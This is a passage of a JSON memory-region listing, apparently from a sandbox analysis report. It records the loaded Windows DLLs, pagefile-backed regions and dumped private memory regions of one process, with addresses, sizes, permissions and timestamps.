"timestamp": "00:01:41.375", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 188416, "start_va": 8791763517440, "type": "region", "version": 1 }, "end_va": 8791763705855, "entry_point": 8791763521552, "filename": "\\Windows\\System32\\imm32.dll", "id": "region_622", "name": "imm32.dll", "norm_filename": "c:\\windows\\system32\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 8791763517440, "timestamp": "00:01:41.375", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 352256, "start_va": 8791731273728, "type": "region", "version": 1 }, "end_va": 8791731625983, "entry_point": 8791731321792, "filename": "\\Windows\\System32\\uxtheme.dll", "id": "region_623", "name": "uxtheme.dll", "norm_filename": "c:\\windows\\system32\\uxtheme.dll", "region_type": "memory_mapped_file", "start_va": 8791731273728, "timestamp": "00:01:41.377", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1245184, "type": "region", "version": 1 }, "end_va": 1249279, "entry_point": 0, "filename": null, "id": "region_633", "name": "pagefile_0x0000000000130000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1245184, "timestamp": "00:01:41.508", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1310720, "type": "region", "version": 1 }, "end_va": 1314815, "entry_point": 0, "filename": null, "id": "region_634", "name": "pagefile_0x0000000000140000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1310720, "timestamp": "00:01:41.508", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000635-addr_0x0000000001d80000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_658", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 30932992, "type": "region", "version": 1 }, "end_va": 31457279, "entry_point": 0, "filename": null, "id": "region_635", "name": "private_0x0000000001d80000", "norm_filename": null, "region_type": "private_memory", "start_va": 30932992, "timestamp": "00:01:41.509", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 913408, "start_va": 32178176, "type": "region", "version": 1 }, "end_va": 33091583, "entry_point": 0, "filename": null, "id": "region_636", "name": "pagefile_0x0000000001eb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 32178176, "timestamp": "00:01:41.509", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 626688, "start_va": 8791760175104, "type": "region", "version": 1 }, "end_va": 8791760801791, "entry_point": 8791760182288, "filename": "\\Windows\\System32\\clbcatq.dll", "id": "region_637", "name": "clbcatq.dll", "norm_filename": "c:\\windows\\system32\\clbcatq.dll", "region_type": "memory_mapped_file", "start_va": 8791760175104, "timestamp": "00:01:41.509", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 14188544, "start_va": 8791775313920, "type": "region", "version": 1 }, "end_va": 8791789502463, "entry_point": 8791775825596, "filename": "\\Windows\\System32\\shell32.dll", "id": "region_638", "name": "shell32.dll", "norm_filename": "c:\\windows\\system32\\shell32.dll", "region_type": "memory_mapped_file", "start_va": 8791775313920, "timestamp": "00:01:41.510", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 122880, "start_va": 8791742087168, "type": "region", "version": 1 }, "end_va": 8791742210047, "entry_point": 8791742092216, "filename": "\\Windows\\System32\\userenv.dll", "id": "region_639", "name": "userenv.dll", "norm_filename": "c:\\windows\\system32\\userenv.dll", "region_type": "memory_mapped_file", "start_va": 8791742087168, "timestamp": "00:01:41.515", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 8791755063296, "type": "region", "version": 1 }, "end_va": 8791755124735, "entry_point": 8791755069872, "filename": "\\Windows\\System32\\profapi.dll", "id": "region_640", "name": "profapi.dll", "norm_filename": "c:\\windows\\system32\\profapi.dll", "region_type": "memory_mapped_file", "start_va": 8791755063296, "timestamp": "00:01:41.516", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 1376256, "type": "region", "version": 1 }, "end_va": 1384447, "entry_point": 0, "filename": null, "id": "region_641", "name": "pagefile_0x0000000000150000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1376256, "timestamp": "00:01:41.524", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2048000, "start_va": 8791733239808, "type": "region", "version": 1 }, "end_va": 8791735287807, "entry_point": 8791734864164, "filename": "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll", "id": "region_642", "name": "comctl32.dll", "norm_filename": "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll", "region_type": "memory_mapped_file", "start_va": 8791733239808, "timestamp": "00:01:41.524", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 29294592, "type": "region", "version": 1 }, "end_va": 29298687, "entry_point": 0, "filename": null, "id": "region_643", "name": "pagefile_0x0000000001bf0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 29294592, "timestamp": "00:01:41.540", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 29360128, "type": "region", "version": 1 }, "end_va": 29368319, "entry_point": 0, "filename": null, "id": "region_644", "name": "pagefile_0x0000000001c00000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 29360128, "timestamp": "00:01:41.540", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000645-addr_0x0000000001cb0000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_659", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 30081024, "type": "region", "version": 1 }, "end_va": 30605311, "entry_point": 0, "filename": null, "id": "region_645", "name": "private_0x0000000001cb0000", "norm_filename": null, "region_type": "private_memory", "start_va": 30081024, "timestamp": "00:01:41.540", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 33095680, "type": "region", "version": 1 }, "end_va": 36040703, "entry_point": 33095680, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_646", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 33095680, "timestamp": "00:01:41.540", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1228800, "start_va": 8791731666944, "type": "region", "version": 1 }, "end_va": 8791732895743, "entry_point": 8791731705020, "filename": "\\Windows\\System32\\propsys.dll", "id": "region_647", "name": "propsys.dll", "norm_filename": "c:\\windows\\system32\\propsys.dll", "region_type": "memory_mapped_file", "start_va": 8791731666944, "timestamp": "00:01:41.541", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000648-addr_0x000007fffffdc000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_660", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092874752, "type": "region", "version": 1 }, "end_va": 8796092882943, "entry_point": 0, "filename": null, "id": "region_648", "name": "private_0x000007fffffdc000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092874752, "timestamp": "00:01:41.542", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 184320, "start_va": 8791723409408, "type": "region", "version": 1 }, "end_va": 8791723593727, "entry_point": 8791723413520, "filename": "\\Windows\\System32\\ntmarta.dll", "id": "region_649", "name": "ntmarta.dll", "norm_filename": "c:\\windows\\system32\\ntmarta.dll", "region_type": "memory_mapped_file", "start_va": 8791723409408, "timestamp": "00:01:41.543", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 335872, "start_va": 8791769612288, "type": "region", "version": 1 }, "end_va": 8791769948159, "entry_point": 8791769616596, "filename": "\\Windows\\System32\\Wldap32.dll", "id": "region_650", "name": "wldap32.dll", "norm_filename": "c:\\windows\\system32\\wldap32.dll", "region_type": "memory_mapped_file", "start_va": 8791769612288, "timestamp": "00:01:41.544", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 29425664, "type": "region", "version": 1 }, "end_va": 29442047, "entry_point": 29425664, "filename": "\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db", "id": "region_651", "name": "cversions.1.db", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db", "region_type": "memory_mapped_file", "start_va": 29425664, "timestamp": "00:01:41.648", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 114688, "start_va": 29491200, "type": "region", "version": 1 }, "end_va": 29605887, "entry_point": 29491200, "filename": "\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000e.db", "id": "region_652", "name": "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000e.db", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000e.db", "region_type": "memory_mapped_file", "start_va": 29491200, "timestamp": "00:01:41.649", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 29622272, "type": "region", "version": 1 }, "end_va": 29626367, "entry_point": 0, "filename": null, "id": "region_653", "name": "pagefile_0x0000000001c40000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 29622272, "timestamp": "00:01:41.649", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 221184, "start_va": 8791755784192, "type": "region", "version": 1 }, "end_va": 8791756005375, "entry_point": 8791755789428, "filename": "\\Windows\\System32\\cfgmgr32.dll", "id": "region_654", "name": "cfgmgr32.dll", "norm_filename": "c:\\windows\\system32\\cfgmgr32.dll", "region_type": "memory_mapped_file", "start_va": 8791755784192, "timestamp": "00:01:41.649", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 106496, "start_va": 8791758929920, "type": "region", "version": 1 }, "end_va": 8791759036415, "entry_point": 8791758935384, "filename": "\\Windows\\System32\\devobj.dll", "id": "region_655", "name": "devobj.dll", "norm_filename": "c:\\windows\\system32\\devobj.dll", "region_type": "memory_mapped_file", "start_va": 8791758929920, "timestamp": "00:01:41.649", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1929216, "start_va": 8791773020160, "type": "region", "version": 1 }, "end_va": 8791774949375, "entry_point": 8791773024272, "filename": "\\Windows\\System32\\setupapi.dll", "id": "region_656", "name": "setupapi.dll", "norm_filename": "c:\\windows\\system32\\setupapi.dll", "region_type": "memory_mapped_file", "start_va": 8791773020160, "timestamp": "00:01:41.650", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4141056, "start_va": 36044800, "type": "region", "version": 1 }, "end_va": 40185855, "entry_point": 0, "filename": null, "id": "region_657", "name": "pagefile_0x0000000002260000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 36044800, "timestamp": "00:01:41.809", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000658-addr_0x00000000026c0000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_661", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 40632320, "type": "region", "version": 1 }, "end_va": 41156607, "entry_point": 0, "filename": null, "id": "region_658", "name": "private_0x00000000026c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 40632320, "timestamp": "00:01:41.809", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 212992, "start_va": 8791656235008, "type": "region", "version": 1 }, "end_va": 8791656447999, "entry_point": 8791656235008, "filename": "\\Windows\\System32\\shdocvw.dll", "id": "region_659", "name": "shdocvw.dll", "norm_filename": "c:\\windows\\system32\\shdocvw.dll", "region_type": "memory_mapped_file", "start_va": 8791656235008, "timestamp": "00:01:41.809", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 8791697719296, "type": "region", "version": 1 }, "end_va": 8791698075647, "entry_point": 8791697723672, "filename": "\\Windows\\System32\\apphelp.dll", "id": "region_660", "name": "apphelp.dll", "norm_filename": "c:\\windows\\system32\\apphelp.dll", "region_type": "memory_mapped_file", "start_va": 8791697719296, "timestamp": "00:01:41.819", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000661-addr_0x000007fffffda000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_662", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092866560, "type": "region", "version": 1 }, "end_va": 8796092874751, "entry_point": 0, "filename": null, "id": "region_661", "name": "private_0x000007fffffda000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092866560, "timestamp": "00:01:41.819", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 29425664, "type": "region", "version": 1 }, "end_va": 29442047, "entry_point": 29425664, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db", "id": "region_662", "name": "cversions.2.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db", "region_type": "memory_mapped_file", "start_va": 29425664, "timestamp": "00:01:41.923", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 196608, "start_va": 29687808, "type": "region", "version": 1 }, "end_va": 29884415, "entry_point": 29687808, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000012.db", "id": "region_663", "name": "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000012.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000012.db", "region_type": "memory_mapped_file", "start_va": 29687808, "timestamp": "00:01:41.923", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 29884416, "type": "region", "version": 1 }, "end_va": 29900799, "entry_point": 29884416, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db", "id": "region_664", "name": "cversions.2.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db", "region_type": "memory_mapped_file", "start_va": 29884416, "timestamp": "00:01:41.924", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 417792, "start_va": 41156608, "type": "region", "version": 1 }, "end_va": 41574399, "entry_point": 41156608, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db", "id": "region_665", "name": "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db", "region_type": "memory_mapped_file", "start_va": 41156608, "timestamp": "00:01:41.924", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000666-addr_0x0000000002950000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_663", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 43319296, "type": "region", "version": 1 }, "end_va": 43843583, "entry_point": 0, "filename": null, "id": "region_666", "name": "private_0x0000000002950000", "norm_filename": null, "region_type": "private_memory", "start_va": 43319296, "timestamp": "00:01:41.925", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 8791656169472, "type": "region", "version": 1 }, "end_va": 8791656218623, "entry_point": 8791656174464, "filename": "\\Windows\\System32\\linkinfo.dll", "id": "region_667", "name": "linkinfo.dll", "norm_filename": "c:\\windows\\system32\\linkinfo.dll", "region_type": "memory_mapped_file", "start_va": 8791656169472, "timestamp": "00:01:41.925", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 524288, "start_va": 8791676289024, "type": "region", "version": 1 }, "end_va": 8791676813311, "entry_point": 8791676308108, "filename": "\\Windows\\System32\\ntshrui.dll", "id": "region_668", "name": "ntshrui.dll", "norm_filename": "c:\\windows\\system32\\ntshrui.dll", "region_type": "memory_mapped_file", "start_va": 8791676289024, "timestamp": "00:01:41.925", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 8791676813312, "type": "region", "version": 1 }, "end_va": 8791676874751, "entry_point": 8791676817472, "filename": "\\Windows\\System32\\cscapi.dll", "id": "region_669", "name": "cscapi.dll", "norm_filename": "c:\\windows\\system32\\cscapi.dll", "region_type": "memory_mapped_file", "start_va": 8791676813312, "timestamp": "00:01:41.925", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 45056, "start_va": 8791718297600, "type": "region", "version": 1 }, "end_va": 8791718342655, "entry_point": 8791718317964, "filename": "\\Windows\\System32\\slc.dll", "id": "region_670", "name": "slc.dll", "norm_filename": "c:\\windows\\system32\\slc.dll", "region_type": "memory_mapped_file", "start_va": 8791718297600, "timestamp": "00:01:41.926", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 143360, "start_va": 8791752900608, "type": "region", "version": 1 }, "end_va": 8791753043967, "entry_point": 8791752905112, "filename": "\\Windows\\System32\\srvcli.dll", "id": "region_671", "name": "srvcli.dll", "norm_filename": "c:\\windows\\system32\\srvcli.dll", "region_type": "memory_mapped_file", "start_va": 8791752900608, "timestamp": "00:01:41.926", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000672-addr_0x000007fffffd8000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_664", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092858368, "type": "region", "version": 1 }, "end_va": 8796092866559, "entry_point": 0, "filename": null, "id": "region_672", "name": "private_0x000007fffffd8000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092858368, "timestamp": "00:01:41.927", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 94208, "start_va": 8791747657728, "type": "region", "version": 1 }, "end_va": 8791747751935, "entry_point": 8791747670712, "filename": "\\Windows\\System32\\cryptsp.dll", "id": "region_673", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\system32\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 8791747657728, "timestamp": "00:01:41.939", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 290816, "start_va": 8791744512000, "type": "region", "version": 1 }, "end_va": 8791744802815, "entry_point": 8791744516196, "filename": "\\Windows\\System32\\rsaenh.dll", "id": "region_674", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\system32\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 8791744512000, "timestamp": "00:01:41.946", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 626688, "start_va": 8791428366336, "type": "region", "version": 1 }, "end_va": 8791428993023, "entry_point": 8791428376176, "filename": "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscoreei.dll", "id": "region_675", "name": "mscoreei.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\mscoreei.dll", "region_type": "memory_mapped_file", "start_va": 8791428366336, "timestamp": "00:01:41.957", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 8791740121088, "type": "region", "version": 1 }, "end_va": 8791740170239, "entry_point": 8791740125284, "filename": "\\Windows\\System32\\version.dll", "id": "region_676", "name": "version.dll", "norm_filename": "c:\\windows\\system32\\version.dll", "region_type": "memory_mapped_file", "start_va": 8791740121088, "timestamp": "00:01:41.997", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 29949952, "type": "region", "version": 1 }, "end_va": 29954047, "entry_point": 0, "filename": null, "id": "region_677", "name": "pagefile_0x0000000001c90000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 29949952, "timestamp": "00:01:42.015", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000678-addr_0x00000000027b0000-size_0x0000000000080000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_665", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 41615360, "type": "region", "version": 1 }, "end_va": 42139647, "entry_point": 0, "filename": null, "id": "region_678", "name": "private_0x00000000027b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 41615360, "timestamp": "00:01:42.015", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 823296, "start_va": 1963065344, "type": "region", "version": 1 }, "end_va": 1963888639, "entry_point": 1963065344, "filename": "\\Windows\\winsxs\\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_88e41e092fab0294\\msvcr80.dll", "id": "region_679", "name": "msvcr80.dll", "norm_filename": "c:\\windows\\winsxs\\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_88e41e092fab0294\\msvcr80.dll", "region_type": "memory_mapped_file", "start_va": 1963065344, "timestamp": "00:01:42.015", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 10080256, "start_va": 8791398088704, "type": "region", "version": 1 }, "end_va": 8791408168959, "entry_point": 8791398088704, "filename": "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorwks.dll", "id": "region_680", "name": "mscorwks.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\mscorwks.dll", "region_type": "memory_mapped_file", "start_va": 8791398088704, "timestamp": "00:01:42.032", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 30605312, "type": "region", "version": 1 }, "end_va": 30617599, "entry_point": 0, "filename": null, "id": "region_687", "name": "pagefile_0x0000000001d30000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 30605312, "timestamp": "00:01:42.611", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 30670848, "type": "region", "version": 1 }, "end_va": 30674943, "entry_point": 0, "filename": null, "id": "region_688", "name": "pagefile_0x0000000001d40000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 30670848, "timestamp": "00:01:42.611", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000689-addr_0x0000000001d60000-size_0x0000000000020000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_670", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 30801920, "type": "region", "version": 1 }, "end_va": 30932991, "entry_point": 0, "filename": null, "id": "region_689", "name": "private_0x0000000001d60000", "norm_filename": null, "region_type": "private_memory", "start_va": 30801920, "timestamp": "00:01:42.612", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000690-addr_0x0000000002910000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_671", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 43057152, "type": 